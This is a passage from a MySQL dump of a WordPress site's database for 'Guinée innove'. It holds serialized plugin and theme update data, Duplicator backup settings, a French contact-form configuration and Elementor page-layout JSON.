"1x\";s:73:\"https://ps.w.org/popup-by-supsystic/assets/banner-772x250.png?rev=1684293\";s:7:\"default\";s:74:\"https://ps.w.org/popup-by-supsystic/assets/banner-1544x500.png?rev=1684294\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":11:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:5:\"5.9.1\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/wordpress-seo.5.9.1.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-128x128.png?rev=1550389\";s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=1550389\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1203032\";s:7:\"default\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1203032\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1695112\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=1695112\";s:7:\"default\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1695112\";}s:11:\"banners_rtl\";a:3:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1695112\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=1695112\";s:7:\"default\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1695112\";}s:6:\"tested\";s:5:\"4.9.1\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:7:{s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"4.9.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.4.9.1.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-128x128.png?rev=984007\";s:2:\"2x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=984007\";s:7:\"default\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=984007\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";s:7:\"default\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";}s:11:\"banners_rtl\";a:0:{}}s:25:\"duplicator/duplicator.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:24:\"w.org/plugins/duplicator\";s:4:\"slug\";s:10:\"duplicator\";s:6:\"plugin\";s:25:\"duplicator/duplicator.php\";s:11:\"new_version\";s:6:\"1.2.30\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/duplicator/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/duplicator.1.2.30.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:63:\"https://ps.w.org/duplicator/assets/icon-128x128.png?rev=1298463\";s:2:\"2x\";s:63:\"https://ps.w.org/duplicator/assets/icon-256x256.png?rev=1298463\";s:7:\"default\";s:63:\"https://ps.w.org/duplicator/assets/icon-256x256.png?rev=1298463\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:65:\"https://ps.w.org/duplicator/assets/banner-772x250.png?rev=1645055\";s:7:\"default\";s:65:\"https://ps.w.org/duplicator/assets/banner-772x250.png?rev=1645055\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/easy-twitter-feed-widget\";s:4:\"slug\";s:24:\"easy-twitter-feed-widget\";s:6:\"plugin\";s:53:\"easy-twitter-feed-widget/easy-twitter-feed-widget.php\";s:11:\"new_version\";s:3:\"0.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/easy-twitter-feed-widget/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/easy-twitter-feed-widget.0.8.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:77:\"https://ps.w.org/easy-twitter-feed-widget/assets/icon-128x128.png?rev=1025015\";s:2:\"2x\";s:77:\"https://ps.w.org/easy-twitter-feed-widget/assets/icon-256x256.png?rev=1025015\";s:7:\"default\";s:77:\"https://ps.w.org/easy-twitter-feed-widget/assets/icon-256x256.png?rev=1025015\";}s:7:\"banners\";a:3:{s:2:\"2x\";s:80:\"https://ps.w.org/easy-twitter-feed-widget/assets/banner-1544x500.png?rev=1025015\";s:2:\"1x\";s:79:\"https://ps.w.org/easy-twitter-feed-widget/assets/banner-772x250.png?rev=1025015\";s:7:\"default\";s:80:\"https://ps.w.org/easy-twitter-feed-widget/assets/banner-1544x500.png?rev=1025015\";}s:11:\"banners_rtl\";a:0:{}}s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:38:\"w.org/plugins/facebook-like-box-widget\";s:4:\"slug\";s:24:\"facebook-like-box-widget\";s:6:\"plugin\";s:53:\"facebook-like-box-widget/facebook-like-box-widget.php\";s:11:\"new_version\";s:3:\"2.9\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/facebook-like-box-widget/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/facebook-like-box-widget.zip\";s:5:\"icons\";a:0:{}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/hello-dolly.1.6.zip\";s:5:\"icons\";a:3:{s:2:\"1x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=969907\";s:2:\"2x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";s:7:\"default\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";s:7:\"default\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";}s:11:\"banners_rtl\";a:0:{}}s:35:\"redux-framework/redux-framework.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:29:\"w.org/plugins/redux-framework\";s:4:\"slug\";s:15:\"redux-framework\";s:6:\"plugin\";s:35:\"redux-framework/redux-framework.php\";s:11:\"new_version\";s:7:\"3.6.7.7\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/redux-framework/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/redux-framework.3.6.7.7.zip\";s:5:\"icons\";a:4:{s:2:\"1x\";s:67:\"https://ps.w.org/redux-framework/assets/icon-128x128.png?rev=995554\";s:2:\"2x\";s:67:\"https://ps.w.org/redux-framework/assets/icon-256x256.png?rev=995554\";s:3:\"svg\";s:59:\"https://ps.w.org/redux-framework/assets/icon.svg?rev=995554\";s:7:\"default\";s:59:\"https://ps.w.org/redux-framework/assets/icon.svg?rev=995554\";}s:7:\"banners\";a:2:{s:2:\"1x\";s:69:\"https://ps.w.org/redux-framework/assets/banner-772x250.png?rev=793165\";s:7:\"default\";s:69:\"https://ps.w.org/redux-framework/assets/banner-772x250.png?rev=793165\";}s:11:\"banners_rtl\";a:0:{}}s:27:\"trackserver/trackserver.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/trackserver\";s:4:\"slug\";s:11:\"trackserver\";s:6:\"plugin\";s:27:\"trackserver/trackserver.php\";s:11:\"new_version\";s:5:\"3.0.1\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/trackserver/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/trackserver.zip\";s:5:\"icons\";a:0:{}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}}}','no'),(2497,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1512725928;s:7:\"checked\";a:4:{s:6:\"magzma\";s:3:\"1.1\";s:13:\"twentyfifteen\";s:3:\"1.8\";s:15:\"twentyseventeen\";s:3:\"1.3\";s:13:\"twentysixteen\";s:3:\"1.3\";}s:8:\"response\";a:3:{s:13:\"twentyfifteen\";a:4:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"1.9\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.1.9.zip\";}s:15:\"twentyseventeen\";a:4:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.1.4.zip\";}s:13:\"twentysixteen\";a:4:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.1.4.zip\";}}s:12:\"translations\";a:0:{}}','no'),(2498,'duplicator_settings','a:10:{s:7:\"version\";s:6:\"1.2.30\";s:18:\"uninstall_settings\";b:1;s:15:\"uninstall_files\";b:1;s:16:\"uninstall_tables\";b:1;s:13:\"package_debug\";b:0;s:17:\"package_mysqldump\";b:1;s:22:\"package_mysqldump_path\";s:0:\"\";s:24:\"package_phpdump_qrylimit\";s:3:\"100\";s:17:\"package_zip_flush\";b:0;s:20:\"storage_htaccess_off\";b:0;}','yes'),(2499,'duplicator_version_plugin','1.2.30','yes'),(2500,'duplicator_package_active','O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2017-12-08 09:39:12\";s:7:\"Version\";s:6:\"1.2.30\";s:9:\"VersionWP\";s:5:\"4.8.4\";s:9:\"VersionDB\";s:7:\"10.0.31\";s:10:\"VersionPHP\";s:6:\"5.6.32\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";N;s:4:\"Name\";s:26:\"20171208_guineeinnovations\";s:4:\"Hash\";s:32:\"1532b4eeaf4d9dac8367171208093912\";s:8:\"NameHash\";s:59:\"20171208_guineeinnovations_1532b4eeaf4d9dac8367171208093912\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:65:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-snapshots/tmp\";s:8:\"StoreURL\";s:52:\"https://guineeinnove.nimbasolution.com/wp-snapshots/\";s:8:\"ScanFile\";s:69:\"20171208_guineeinnovations_1532b4eeaf4d9dac8367171208093912_scan.json\";s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:6:\"Status\";N;s:6:\"WPUser\";N;s:7:\"Archive\";O:11:\"DUP_Archive\":18:{s:10:\"FilterDirs\";s:0:\"\";s:11:\"FilterFiles\";s:0:\"\";s:10:\"FilterExts\";s:0:\"\";s:13:\"FilterDirsAll\";a:0:{}s:14:\"FilterFilesAll\";a:0:{}s:13:\"FilterExtsAll\";a:0:{}s:8:\"FilterOn\";i:1;s:12:\"ExportOnlyDB\";i:0;s:4:\"File\";N;s:6:\"Format\";s:3:\"ZIP\";s:7:\"PackDir\";s:48:\"/home/fmbangoura7/guineeinnove.nimbasolution.com\";s:4:\"Size\";i:0;s:4:\"Dirs\";a:0:{}s:5:\"Files\";a:0:{}s:10:\"FilterInfo\";O:23:\"DUP_Archive_Filter_Info\":8:{s:4:\"Dirs\";O:34:\"DUP_Archive_Filter_Scope_Directory\":4:{s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:4:\"Core\";a:0:{}s:8:\"Instance\";a:0:{}}s:5:\"Files\";O:29:\"DUP_Archive_Filter_Scope_File\":5:{s:4:\"Size\";a:0:{}s:7:\"Warning\";a:0:{}s:10:\"Unreadable\";a:0:{}s:4:\"Core\";a:0:{}s:8:\"Instance\";a:0:{}}s:4:\"Exts\";O:29:\"DUP_Archive_Filter_Scope_Base\":2:{s:4:\"Core\";a:0:{}s:8:\"Instance\";a:0:{}}s:9:\"UDirCount\";i:0;s:10:\"UFileCount\";i:0;s:9:\"UExtCount\";i:0;s:8:\"TreeSize\";a:0:{}s:11:\"TreeWarning\";a:0:{}}s:10:\"\0*\0Package\";O:11:\"DUP_Package\":23:{s:7:\"Created\";s:19:\"2017-12-08 09:39:12\";s:7:\"Version\";s:6:\"1.2.30\";s:9:\"VersionWP\";s:5:\"4.8.4\";s:9:\"VersionDB\";s:7:\"10.0.31\";s:10:\"VersionPHP\";s:6:\"5.6.32\";s:9:\"VersionOS\";s:5:\"Linux\";s:2:\"ID\";N;s:4:\"Name\";s:26:\"20171208_guineeinnovations\";s:4:\"Hash\";s:32:\"1532b4eeaf4d9dac8367171208093912\";s:8:\"NameHash\";s:59:\"20171208_guineeinnovations_1532b4eeaf4d9dac8367171208093912\";s:4:\"Type\";i:0;s:5:\"Notes\";s:0:\"\";s:9:\"StorePath\";s:65:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-snapshots/tmp\";s:8:\"StoreURL\";s:52:\"https://guineeinnove.nimbasolution.com/wp-snapshots/\";s:8:\"ScanFile\";N;s:7:\"Runtime\";N;s:7:\"ExeSize\";N;s:7:\"ZipSize\";N;s:6:\"Status\";N;s:6:\"WPUser\";N;s:7:\"Archive\";r:22;s:9:\"Installer\";O:13:\"DUP_Installer\":7:{s:4:\"File\";N;s:4:\"Size\";i:0;s:10:\"OptsDBHost\";s:0:\"\";s:10:\"OptsDBPort\";s:0:\"\";s:10:\"OptsDBName\";s:0:\"\";s:10:\"OptsDBUser\";s:0:\"\";s:10:\"\0*\0Package\";r:57;}s:8:\"Database\";O:12:\"DUP_Database\":13:{s:4:\"Type\";s:5:\"MySQL\";s:4:\"Size\";N;s:4:\"File\";N;s:4:\"Path\";N;s:12:\"FilterTables\";s:0:\"\";s:8:\"FilterOn\";i:0;s:4:\"Name\";N;s:10:\"Compatible\";s:0:\"\";s:8:\"Comments\";s:14:\"MariaDB Server\";s:10:\"\0*\0Package\";r:57;s:25:\"\0DUP_Database\0dbStorePath\";N;s:23:\"\0DUP_Database\0EOFMarker\";s:0:\"\";s:26:\"\0DUP_Database\0networkFlush\";b:0;}}s:29:\"\0DUP_Archive\0tmpFilterDirsAll\";a:0:{}s:24:\"\0DUP_Archive\0wpCorePaths\";a:6:{i:0;s:57:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-admin\";i:1;s:67:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/uploads\";i:2;s:69:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/languages\";i:3;s:67:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/plugins\";i:4;s:66:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-content/themes\";i:5;s:60:\"/home/fmbangoura7/guineeinnove.nimbasolution.com/wp-includes\";}}s:9:\"Installer\";r:79;s:8:\"Database\";r:87;}','yes');
/*!40000 ALTER TABLE `wpfy_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfy_postmeta`
--

/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfy_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3145 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfy_postmeta`
--

LOCK TABLES `wpfy_postmeta` WRITE;
/*!40000 ALTER TABLE `wpfy_postmeta` DISABLE KEYS */;
INSERT INTO `wpfy_postmeta` VALUES (1,2,'_wp_page_template','default'),(4,5,'_form','<label> Votre nom (obligatoire)\n    [text* your-name] </label>\n\n<label> Votre e-mail (obligatoire)\n    [email* your-email] </label>\n\n<label> Sujet\n    [text your-subject] </label>\n\n<label> Votre message\n    [textarea your-message] </label>\n\n[submit \"Envoyer\"]'),(5,5,'_mail','a:8:{s:7:\"subject\";s:31:\"Guinée innove \"[your-subject]\"\";s:6:\"sender\";s:50:\"[your-name] <admin@guineeinnove.nimbasolution.com>\";s:4:\"body\";s:210:\"De : [your-name] <[your-email]>\nSujet : [your-subject]\n\nCorps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\";s:9:\"recipient\";s:36:\"admin@guineeinnove.nimbasolution.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(6,5,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:31:\"Guinée innove \"[your-subject]\"\";s:6:\"sender\";s:53:\"Guinée innove <admin@guineeinnove.nimbasolution.com>\";s:4:\"body\";s:154:\"Corps du message :\n[your-message]\n\n-- \nCet e-mail a été envoyé via le formulaire de contact de Guinée innove (https://guineeinnove.nimbasolution.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:46:\"Reply-To: admin@guineeinnove.nimbasolution.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(7,5,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Merci pour votre message. Il a été envoyé.\";s:12:\"mail_sent_ng\";s:102:\"Une erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\";s:16:\"validation_error\";s:88:\"Un ou plusieurs champs contiennent une erreur. Veuillez vérifier et essayer à nouveau.\";s:4:\"spam\";s:102:\"Une erreur s’est produite lors de l’envoi de votre message. Veuillez essayer à nouveau plus tard.\";s:12:\"accept_terms\";s:75:\"Vous devez accepter les termes et conditions avant d\'envoyer votre message.\";s:16:\"invalid_required\";s:25:\"Ce champ est obligatoire.\";s:16:\"invalid_too_long\";s:23:\"Le champ est trop long.\";s:17:\"invalid_too_short\";s:24:\"Le champ est trop court.\";}'),(8,5,'_additional_settings',NULL),(9,5,'_locale','fr_FR'),(475,357,'_elementor_template_type','page'),(476,357,'_elementor_edit_mode','builder'),(477,357,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"cp33sob\",\"elType\":\"widget\",\"settings\":{\"section_magzma_running_news_general_control\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_running_news_style_control\":\"\",\"running_wrap_bg\":\"#f2f2f7\",\"running_wrap_bord\":\"#e7e7e7\",\"arrow_color\":\"#ffffff\",\"arrow_bg\":\"#000000\",\"arrow_bg_hov\":\"#333333\",\"the_title\":\"Trending Now\",\"title_color\":\"#fff9f9\",\"title_bg_color\":\"#000000\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"title_font_weight\":\"600\",\"title_font_weight_tablet\":\"600\",\"title_font_weight_mobile\":\"600\",\"news_title_color\":\"#000000\",\"news_title_hov_color\":\"#aaaaaa\",\"news_title_font_size\":{\"unit\":\"px\",\"size\":16},\"news_title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"news_title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"news_title_font_weight\":\"500\",\"news_title_font_weight_tablet\":\"500\",\"news_title_font_weight_mobile\":\"500\",\"section_magzma_carousel_options\":\"\",\"autoplay\":\"use\",\"autoplay_ms\":\"2500\",\"auto_loop\":\"use\",\"keyboard_nav\":\"\",\"effect_type\":\"slide\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-running-news\"},{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":